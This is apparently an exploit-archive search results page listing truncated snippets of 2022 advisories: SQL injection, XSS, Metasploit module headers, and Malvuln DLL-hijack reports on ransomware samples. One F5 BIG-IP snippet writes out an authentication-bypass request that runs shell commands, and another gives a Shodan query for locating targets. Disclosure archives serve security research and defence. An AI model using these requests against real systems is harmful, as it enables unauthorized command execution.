50748 matches found
Microfinance Management System 1.0 SQL Injection
Exploit Title: Microfinance Management System 1.0 - 'customernumber' SQLi Date: 2022-25-03 Exploit Author: Eren Gozaydin Vendor Homepage: https://www.sourcecodester.com/php/14822/microfinance-management-system.html Software Link:...
MyBB 1.8.29 Remote Code Execution
Exploit Title: MyBB 1.8.29 - Remote Code Execution RCE Authenticated Date: 2022-05-08 Exploit Author: Altelus Vendor Homepage: https://mybb.com/ Software Link: https://github.com/mybb/mybb/releases/tag/mybb1829 Version: MyBB 1.8.29 Tested on: Linux CVE : CVE-2022-24734 An RCE can be obtained on...
Wondershare Dr.Fone 11.4.10 Insecure Permissions
Exploit Title: Wondershare Dr.Fone 11.4.10 - Insecure File Permissions Date: 04/25/2022 Exploit Author: AkuCyberSec https://github.com/AkuCyberSec Vendor Homepage: https://drfone.wondershare.com/ Software Link: https://download.wondershare.com/drfonefull3360.exe Version: 11.4.10 Tested on: Window...
Apache CouchDB 3.2.1 Remote Code Execution
Exploit Title: Apache CouchDB 3.2.1 - Remote Code Execution RCE Date: 2022-01-21 Exploit Author: Konstantin Burov, @sadshade Software Link: https://couchdb.apache.org/ Version: 3.2.1 and below Tested on: Kali 2021.2 Based on 1F98D's Erlang Cookie - Remote Code Execution Shodan: port:4369 "name...
Ruijie Reyee Mesh Router Remote Code Execution
Exploit Title: Ruijie Reyee Mesh Router - Remote Code Execution RCE Authenticated Google Dork: None Date: November 1, 2021 Exploit Author: Minh Khoa of VSEC Vendor Homepage: https://ruijienetworks.com Software Link: https://www.ruijienetworks.com/resources/products/1896-1900 Version: ReyeeOS...
Google Chrome 78.0.3904.70 Remote Code Execution
Exploit Title: Google Chrome 78.0.3904.70 - Remote Code Execution Date: 2022-05-03 Exploit Author: deadlock Forrest Orr Type: RCE Platform: Windows Website: https://forrest-orr.net Twitter: https://twitter.com/ForrestOrr Vendor Homepage: https://www.google.com/chrome/ Software Link:...
Spring4Shell Spring Framework Class Property Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'Spring Framework Class property RCE Spring4Shell', 'Description' = %q Spring Framework versions 5.3.0 to 5.3.17, 5.2.0 to 5.2.19, and older...
Ransom.Cryakl Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/2aea3b217e6a3d08ef684594192cafc8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Cryakl Vulnerability: Code Execution Description: Cryakl looks for and loads a DLL...
Ransom.Satana Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/46bfd4f1d581d7c0121d2b19a005d3df.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Satana Vulnerability: Code Execution Description: Satana searches for and loads a D...
School Dormitory Management System 1.0 SQL Injection
Exploit Title: School Dormitory Management System - 'month' SQL Injection Date: 08/05/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html Version:...
APT28 FancyBear Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/d6751b148461e0f863548be84020b879.txt Contact: [email protected] Media: twitter.com/malvuln Threat: APT28 FancyBear Vulnerability: Code Execution Description: FancyBear looks for and execute...
School Dormitory Management 1.0 SQL Injection
Title: School Dormitory Management 1.0 SQLi Author: nu11secur1ty Date: 05.09.2022 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15319/school-dormitory-management-system-phpoop-free-source-code.html Reference:...
F5 BIG-IP Remote Code Execution
F5 BIG-IP RCE exploitation CVE-2022-1388 POST 1: POST /mgmt/tm/util/bash HTTP/1.1 Host: :8443 Authorization: Basic YWRtaW46 Connection: keep-alive, X-F5-Auth-Token X-F5-Auth-Token: 0 "command": "run" , "utilCmdArgs": " -c 'id' " curl commandliner: $ curl -i -s -k -X $'POST' -H $'Host: :8443' -H...
Ransom.Petya Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/8ed9a60127aee45336102bf12059a850.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Petya Vulnerability: Code Execution Description: Petya looks for and loads a DLL...
Travel Management System 1.0 SQL Injection
Title: Travel Management System 1.0 Multiple SQLi Author: nu11secur1ty Date: 05.07.2022 Vendor: https://code-projects.org/author/fabian/ Software: https://code-projects.org/travel-management-system-using-php-source-code/ Reference:...
Ransom.Conti Code Execution
Discovery / credits: Malvuln John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/20f0c736a966142de88dee06a2e4a5b1.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Conti Vulnerability: Code Execution Description: Conti looks for and executes DLLs ...
Trojan-Ransom.LockerGoga Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/3b200c8173a92c94441cb062d38012f6.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Ransom.LockerGoga Vulnerability: Code Execution Description: LockerGoga looks f...
Trojan.Ransom.Cryptowall Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/0CFFEE266A8F14103158465E2ECDD2C1.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.Ransom.Cryptowall Vulnerability: Code Execution Description: Cryptowall looks f...
ChatBot Application With A Suggestion Feature 1.0 SQL Injection
Exploit Title: ChatBot Application with a Suggestion Feature 1.0 - 'id' Blind SQL Injection Date: 05/05/2022 Exploit Author: Saud Alenazi Vendor Homepage: https://www.sourcecodester.com/ Software Link: https://www.sourcecodester.com/php/15316/chatbot-app-suggestion-phpoop-free-source-code.html...
Trojan.CryptoLocker Code Execution
Discovery / credits: Malvuln - John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/209a288c68207d57e0ce6e60ebf60729.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan.CryptoLocker Vulnerability: Code Execution Description: Cryptolocker drops a PE...
Trojan-Ransom.Cerber Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/ae99e6a451bc53830be799379f5c1104.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Ransom.Cerber Vulnerability: Code Execution Description: Cerber looks for and...
REvil.Ransom Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/4c5c1731481ea8d67ef6076810c49e00.txt Contact: [email protected] Media: twitter.com/malvuln Threat: REvil.Ransom Vulnerability: Code Execution Description: REvil looks for and executes...
Craft CMS 3.7.36 Password Reset Poisoning Attack
SEC Consult Vulnerability Lab Security Advisory ======================================================================= title: Password Reset Poisoning Attack product: Craft CMS vulnerable version: 3.7.36 and potentially lower fixed version: none, see workaround by vendor CVE number: CVE-2022-299...
Ransom.CTBLocker Code Execution
Discovery / credits: Malvuln - John Page - aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/de25f04dedaffde1be47ef26dc9a8176.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.CTBLocker Vulnerability: Code Execution Description: CTBLocker looks for and...
Trojan-Ransom.Radamant Code Execution
Discovery / credits: Malvuln - John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/6152709e741c4d5a5d793d35817b4c3d.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Trojan-Ransom.Radamant Vulnerability: Code Execution Description: Radamant tries to load...
ZoneMinder Language Settings Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'ZoneMinder Language Settings Remote Code Execution', 'Description' = %q This module exploits arbitrary file write in debug log file option chaine...
PHProjekt PhpSimplyGest / MyProjects 1.3.0 Cross Site Scripting
Exploit Title: PHProjekt PhpSimplyGest / MyProjects, 1.3.0 - Stored XSS Cross-Site Scripting Date: 2022-05-05 Exploit Author: Andrea Intilangelo Vendor Homepage: http://www.phprojekt.altervista.org removed demo was at http://phprojekt.altervista.org/phpsimplygest130 Software Link:...
Ransom.Conti Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/3c55ee6753408bff2e3e6a392ed9f2a0.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.Conti Vulnerability: Code Execution Description: Conti looks for and executes DLLs in its...
Conti.Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/710a77804637f65e22a2e230ff6444f9.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Conti.Ransom Vulnerability: Code Execution Description: Conti looks for and loads a DLL named...
Ransom.WannaCry Code Execution
Discovery / credits: Malvuln - John Page aka hyp3rlinx c 2022 Original source: https://malvuln.com/advisory/84c82835a5d21bbcf75a61706d8ab549.txt Contact: [email protected] Media: twitter.com/malvuln ISR: ApparitionSec Threat: Ransom.WannaCry Vulnerability: Code Execution Description: WannaCry...
Red Planet Laundry Management System 1.0 SQL Injection
Title: Red Planet Laundry Management System 1.0 SQLi Author: nu11secur1ty Date: 05.01.2022 Vendor: https://laundry.redplanetcomputers.com/ Software: https://laundry.redplanetcomputers.com/ Reference: https://github.com/nu11secur1ty/CVE-mitre/tree/main/2022/CVE-2022-28452 Description: The username...
REvil.Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/979635229dfcfae1aae74ae296ec78c8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: REvil.Ransom Vulnerability: Code Execution Description: REvil looks for and executes DLLs in its...
SAP Web Dispatcher HTTP Request Smuggling
Onapsis Security Advisory 2022-0001: HTTP Request Smuggling in SAP Web Dispatcher Impact on Business By injecting an HTTP request as a prefix into a victim's request, a malicious user is able to cause damage in different ways, such as producing a Denial of Service by setting an invalid request as...
LokiLocker Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/2ffc2446a2a6cf04c06a85deb43b9fb8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: LokiLocker Ransom Vulnerability: Code Execution Description: LokiLocker looks for and executes DLLs ...
RedLine.Stealer Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/0adb0e2ac8aa969fb088ee95c4a91536.txt Contact: [email protected] Media: twitter.com/malvuln Threat: RedLine.Stealer Vulnerability: Code Execution Description: RedLine looks for and loads a DLL named...
Ransom.AvosLocker Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/40f2238875fcbd2a92cfefc4846a15a8.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.AvosLocker Vulnerability: Code Execution Description: The ransomware looks for and executes...
BlackBasta Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/998022b70d83c6de68e5bdf94e0f8d71.txt Contact: [email protected] Media: twitter.com/malvuln Threat: BlackBasta Ransom Vulnerability: Code Execution Description: BlackBasta looks for and loads a DLL...
VMware Workspace ONE Access Template Injection / Command Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'VMware Workspace ONE Access CVE-2022-22954', 'Description' = %q This module exploits CVE-2022-22954, an unauthenticated server-side template...
WordPress Stafflist 3.1.2 Cross Site Scripting
Exploit Title: WordPress Plugin stafflist 3.1.2 - Reflected XSS Authenticated Date: 05-02-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/stafflist/ Version: 3.1.2 Tested on: Firefox Contact me: h at spidersilk.com Summary: A cross site scripti...
Tenda HG6 3.3.0 Remote Command Injection
Tenda HG6 v3.3.0 Remote Command Injection Vulnerability Vendor: Tenda Technology Co.,Ltd. Product web page: https://www.tendacn.com https://www.tendacn.com/product/HG6.html Affected version: Firmware version: 3.3.0-210926 Software version: v1.1.0 Hardware Version: v1.0 Check Version:...
REvil Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/7d7ee58c2696794b3be958b165eb61a9.txt Contact: [email protected] Media: twitter.com/malvuln Threat: REvil Ransom Vulnerability: Code Execution Description: REvil looks for and executes DLLs in its...
Conti Ransom Code Execution
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/9eb9197cd58f4417a27621c4e1b25a71.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Conti Ransom Vulnerability: Code Execution Description: Conti looks for and executes DLLs in its...
WSO Arbitrary File Upload / Remote Code Execution
This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'WSO2 Arbitrary File Upload to RCE', 'Description' = %q This module abuses a vulnerability in certain WSO2 products that allow unrestricted file...
WordPress Stafflist 3.1.2 SQL Injection
Exploit Title: WordPress Plugin stafflist 3.1.2 - SQL Injection Authenticated Date: 05-02-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/stafflist/ Version: 3.1.2 Tested on: Firefox Contact me: h at spidersilk.com Vulnerable Code: $w =...
Covid 19 Travel Pass Management System 1.0 SQL Injection
Title: Covid 19 Travel Pass Management System v1.0 SQLi Author: nu11secur1ty Date: 05.01.2022 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15308/covid-19-travel-pass-management-system-phpoop-free-source-code.html Reference:...
Ransom.LockBit DLL Hijacking
Discovery / credits: Malvuln - malvuln.com c 2022 Original source: https://malvuln.com/advisory/96de05212b30ec85d4cf03386c1b84af.txt Contact: [email protected] Media: twitter.com/malvuln Threat: Ransom.LockBit Vulnerability: DLL Hijacking Description: LockBit ransomware looks for and executes...
WordPress Stafflist 3.1.2 Cross Site Request Forgery
Exploit Title: WordPress Plugin stafflist 3.1.2 - CSRF Authenticated Date: 05-02-2022 Exploit Author: Hassan Khan Yusufzai - Splint3r7 Vendor Homepage: https://wordpress.org/plugins/stafflist/ Version: 3.1.2 Tested on: Firefox Contact me: h at spidersilk.com Summary: A CSRF vulnerability exists i...
Strapi 3.6.8 Password Disclosure / Insecure Handling
Exploit Title: Strapi " Date: 2022-03-30 Exploit Author: Kitchaphan Singchai idealphase Vendor Homepage: https://strapi.io/ Software Link: https://github.com/strapi/strapi/releases Vulnerable Version: ..SNIP.. Redirecting to /documentati...
Toll Tax Management System 1.0 SQL Injection
Title: Toll Tax Management System v1.0 SQLi Author: nu11secur1ty Date: 04.07.2022 Vendor: https://www.sourcecodester.com/users/tips23 Software: https://www.sourcecodester.com/php/15304/toll-tax-management-system-phpoop-free-source-code.html Reference:...
Home Clean Service System 1.0 SQL Injection
Title: Home Clean Service System v1.0 - 2022 SQLi Author: nu11secur1ty Date: 04.27.2022 Vendor: https://www.sourcecodester.com/users/acetech Software: https://www.sourcecodester.com/php/15293/home-clean-service-free-source-code.html Reference:...